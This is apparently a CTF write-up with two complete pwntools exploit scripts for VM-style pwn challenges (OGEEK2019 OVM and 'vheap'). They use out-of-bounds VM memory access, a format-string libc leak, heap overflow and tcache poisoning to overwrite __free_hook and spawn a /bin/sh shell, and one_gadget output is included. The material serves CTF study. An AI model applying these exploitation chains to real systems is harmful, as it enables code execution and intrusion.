vm pwn例题
OGEEK2019_FINAL_OVM
数组溢出
from pwn import *
context.log_level = 'debug'
p = process("vmpwn")
elf = ELF("vmpwn")
libc = elf.libc


# Thin wrappers around the tube so the interaction below stays short.
def s(data):
    """Send *data* unchanged."""
    return p.send(data)


def sa(text, data):
    """Wait for *text*, then send str(data)."""
    return p.sendafter(text, str(data))


def sl(data):
    """Send *data* followed by a newline."""
    return p.sendline(data)


def sla(text, data):
    """Wait for *text*, then send str(data) followed by a newline."""
    return p.sendlineafter(text, str(data))


def r(num=4096):
    """Receive up to *num* bytes."""
    return p.recv(num)


def ru(text):
    """Receive until *text* has been seen."""
    return p.recvuntil(text)


def uu32():
    """Read until a 0xf7 byte and unpack the last 4 bytes as a little-endian u32."""
    return u32(p.recvuntil("\xf7")[-4:].ljust(4, "\x00"))


def uu64():
    """Read until a 0x7f byte; zero-pad the last 6 bytes to 8 and unpack as a u64."""
    return u64(p.recvuntil("\x7f")[-6:].ljust(8, "\x00"))


def lg(name, data):
    """Log *data* in hex under the label *name*."""
    return p.success(name + ("-> 0x%x" % data))
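def opcode(code, dst, op1, op2):
    """Encode one VM instruction as the decimal string this script sends.

    The 32-bit word is laid out most-significant byte first:
    ``code`` (opcode), ``dst`` (destination register), ``op1``, ``op2``.

    Every field must fit in a single byte. A larger value would carry into
    the neighbouring field and silently encode a different instruction, so
    it is rejected up front instead.

    Args:
        code: opcode byte.
        dst: destination register index.
        op1: first operand byte.
        op2: second operand byte.

    Returns:
        The instruction word as a decimal string.

    Raises:
        ValueError: if any field is outside 0..0xff.
    """
    fields = (("code", code), ("dst", dst), ("op1", op1), ("op2", op2))
    for label, value in fields:
        if not 0 <= value <= 0xff:
            raise ValueError("%s=%#x does not fit in one byte" % (label, value))
    # OR is safe here because each field has been checked to stay in its byte.
    word = (code << 24) | (dst << 16) | (op1 << 8) | op2
    return str(word)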
# The target prompts for its initial PC, SP and code size before the program.
p.recvuntil("PC: ")
p.sendline('0')
p.recvuntil("SP: ")
p.sendline('1')
p.recvuntil("CODE SIZE: ")
p.sendline('24')
p.recvuntil("CODE: ")

# (code, dst, op1, op2) tuples, sent one per line in exactly this order.
program = [
    # Load the libc pointer stored in the stderr GOT slot into reg[2]/reg[3]
    # by indexing memory[] with a negative register value (the "array
    # overflow" of the heading: no bounds check on the index).
    (0x10, 0, 0, 26),   # reg[0] = 26
    (0x80, 1, 1, 0),    # reg[1] = reg[1] - reg[0] = -26
    (0x30, 2, 0, 1),    # reg[2] = memory[reg[1]]
    (0x10, 0, 0, 25),   # reg[0] = 25
    (0x10, 1, 0, 0),    # reg[1] = 0
    (0x80, 1, 1, 0),    # reg[1] = -25
    (0x30, 3, 0, 1),    # reg[3] = memory[reg[1]]
    # Build 0x10a0 in reg[4] from shifts and adds, then add it to reg[2];
    # per the author's note, stderr + 0x10a0 is __free_hook - 8.
    (0x10, 4, 0, 1),    # reg[4] = 1
    (0x10, 5, 0, 12),   # reg[5] = 12
    (0xc0, 4, 4, 5),    # reg[4] = 1 << 12 = 0x1000
    (0x10, 5, 0, 0xa),  # reg[5] = 0xa
    (0x10, 6, 0, 4),    # reg[6] = 4
    (0xc0, 5, 5, 6),    # reg[5] = 0xa << 4 = 0xa0
    (0x70, 4, 4, 5),    # reg[4] = 0x1000 + 0xa0 = 0x10a0
    (0x70, 2, 4, 2),    # reg[2] = reg[4] + reg[2]
    # Store reg[2]/reg[3] at memory[-8]/memory[-7], which the author
    # identifies as the comment pointer.
    (0x10, 4, 0, 8),    # reg[4] = 8
    (0x10, 1, 0, 0),    # reg[1] = 0
    (0x80, 1, 1, 4),    # reg[1] = 0 - 8 = -8
    (0x40, 2, 0, 1),    # memory[reg[1]] = reg[2]
    (0x10, 5, 0, 7),    # reg[5] = 7
    (0x10, 1, 0, 0),    # reg[1] = 0
    (0x80, 1, 1, 5),    # reg[1] = 0 - reg[5] = -7
    (0x40, 3, 0, 1),    # memory[reg[1]] = reg[3]
    (0xe0, 0, 0, 0),    # exit
]
for code, dst, op1, op2 in program:
    sl(opcode(code, dst, op1, op2))

# After exit the output contains "R2: " / "R3: "; they hold the low and high
# halves of the pointer built above (the +8 undoes the "- 8" in the note).
ru('R2: ')
low = int(r(8), 16) + 8
ru('R3: ')
high = int(r(4), 16)
print('%s %s' % (hex(low), hex(high)))
libc_base = (high << 32) + low - libc.sym['__free_hook']
lg('libc_base', libc_base)
system = libc_base + libc.sym['system']
# The comment is read into the location written above.
sl('/bin/sh\x00' + p64(system))
p.interactive()
vheap
堆溢出修改fd
from pwn import *
from pwnlib.util.packing import u64
from pwnlib.util.packing import p64
context.update(os='linux', arch='amd64', log_level='debug')
# Binary and the matching libc the author used (hard-coded local paths).
elf = ELF('/home/zp9080/PWN/vheap')
libc = ELF('/home/zp9080/PWN/libc-2.27.so')
p = process('/home/zp9080/PWN/vheap')
def dbg():
    """Attach gdb to the running target at the author's breakpoint, then pause."""
    breakpoint_cmd = 'b *$rebase(0xEC6 )'
    gdb.attach(p, breakpoint_cmd)
    pause()
# Thin wrappers around the tube.
def s(data):
    """Send *data* unchanged."""
    return p.send(data)


def sa(text, data):
    """Wait for *text*, then send *data*."""
    return p.sendafter(text, data)


def sl(data):
    """Send *data* followed by a newline."""
    return p.sendline(data)


def sla(text, data):
    """Wait for *text*, then send *data* followed by a newline."""
    return p.sendlineafter(text, data)


def r(num=4096):
    """Receive up to *num* bytes."""
    return p.recv(num)


def ru(text):
    """Receive until *text* has been seen."""
    return p.recvuntil(text)


def uu64():
    """Read until a 0x7f byte; zero-pad the last 6 bytes to 8 and unpack as a u64."""
    return u64(p.recvuntil("\x7f")[-6:].ljust(8, "\x00"))


def lg(name, data):
    """Log *data* in hex under the label *name*."""
    return p.success(name + ("-> 0x%x" % data))


# The name prompt is echoed back through a format string; '%20$p' prints the
# 20th stack argument, which the author treats as __libc_start_main+231.
pay = '%20$p'
sla("first,tell me your name.", pay)
p.recvuntil("welcome:")
leaked = int(p.recv(14), 16)
libc_base = leaked - 231 - libc.sym['__libc_start_main']
lg('libc_base', libc_base)
free_hook = libc_base + libc.sym['__free_hook']
# Offset of the one_gadget whose constraints are listed at the end of the file.
one = libc_base + 0x4f302
sla("How many pieces of data?\n", '2')
# First piece: 0x18 filler, a size field and a pointer ("heap overflow
# modifies fd" in the heading); second piece: the gadget address.
s(b'a' * 0x18 + p64(0x70) + p64(free_hook))
s(p64(one))
p.recvuntil("Size:\n")
s('9')
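def pack(code, dst, op2, op1):
    """Encode one VM instruction as the decimal string this script sends.

    The 32-bit word is laid out most-significant byte first:
    ``code``, ``dst``, then the third argument ``op2`` in bits 8..15 and the
    fourth argument ``op1`` in bits 0..7. Note the parameter order: it is the
    reverse of the ``opcode`` helper used by the first script in this file.

    Every field must fit in a single byte. A larger value would carry into
    the neighbouring field and silently encode a different instruction, so
    it is rejected up front instead.

    Args:
        code: opcode byte.
        dst: destination register index.
        op2: byte placed in bits 8..15.
        op1: byte placed in bits 0..7.

    Returns:
        The instruction word as a decimal string.

    Raises:
        ValueError: if any field is outside 0..0xff.
    """
    fields = (("code", code), ("dst", dst), ("op2", op2), ("op1", op1))
    for label, value in fields:
        if not 0 <= value <= 0xff:
            raise ValueError("%s=%#x does not fit in one byte" % (label, value))
    # OR is safe here because each field has been checked to stay in its byte.
    word = (code << 24) | (dst << 16) | (op2 << 8) | op1
    return str(word)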
p.recvuntil("[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++]")

# (code, dst, op2, op1) tuples in the argument order of pack(), sent one per
# line in exactly this order. Only 0xb is annotated by the author (memcpy);
# the meaning of 0xa and 0xc is not stated on this page.
vm_program = [
    (0xa, 0, 0x10, 0),
    (0xa, 0, 0x60, 1),
    (0xa, 0, 0x60, 2),
    (0xc, 0, 0, 1),
    # Author's note: go straight for tcache poisoning.
    (0xb, 0, 0, 0),     # memcpy
    (0xa, 0, 0x60, 0),
    (0xa, 0, 0x60, 1),
    (0xb, 1, 0, 1),
    (0xc, 0, 0, 2),
]
for code, dst, op2, op1 in vm_program:
    p.sendline(pack(code, dst, op2, op1))
p.interactive()
'''
0x4f2a5 execve("/bin/sh", rsp+0x40, environ)
constraints:
rsp & 0xf == 0
rcx == NULL
0x4f302 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL
0x10a2fc execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''